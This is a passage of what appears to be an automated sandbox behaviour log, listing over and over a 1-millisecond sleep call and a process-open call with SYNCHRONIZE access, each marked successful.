System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
